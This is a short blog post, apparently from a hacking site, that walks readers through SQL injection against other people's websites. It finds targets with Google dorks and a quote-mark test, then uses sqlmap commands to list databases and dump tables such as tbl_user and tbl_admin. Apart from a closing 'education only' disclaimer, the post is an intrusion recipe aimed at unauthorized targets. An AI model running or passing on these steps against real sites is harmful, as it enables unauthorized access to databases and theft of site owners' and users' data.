SQL Injection with Kali Linux

Posted by Unknown on 11:34 with No comments
Today we are going to cover SQL Database hacking with Kali Linux

Tools needed: 1. Internet connection
                        2. Kali Linux
Oke then lets start:

Step one:
Find a SQL error type vulnerable website.You can find this on google  dork or by typing this code in google .php?id=1
To find  find out if a website is vulnerable to a SQL error just put a ‘ after it.
or you can scan it using a SQL error finding tool(vega is what i recommend).


Step two:
Open SQLmap in Kali Linux.There are a lot SQL databse injection tools but we will use SQLmap.You can visit SQLmap website click here to take a look at it features.        


Step Three:
Once SQlmap is opened then type this command
sqlmap -u http://www.example.com/index.php?id=1 --dbs


This will show you the all the databases

Now type this command

sqlmap -u http://example.com/index.php?id=1 --dbs --tables


This will list all the tables each database has


Step Four: 
Search for a table which has some juicy information,such a tbl_user,tbl_admin.Or if you think that all the tables  are important then there no problem.

To dump the table type this command

sqlmap -u http://www.example.com/index.php?id=1 --dbs -T table_name --dump


or if you want to dump entire database then type this command

sqlmap -u http://www.example.com/index.php?id=1 --dbs --dump-all


als the dumped file will be located in this folder /root/.sqlmap/output



If there is any thing you did not understand then please leave a comment or send us a message on facebook.

Hacking Information. Is not responsible for any damage caused by our post.
                                  breaching someones website is illegal.this post is for
                                  education purpose only.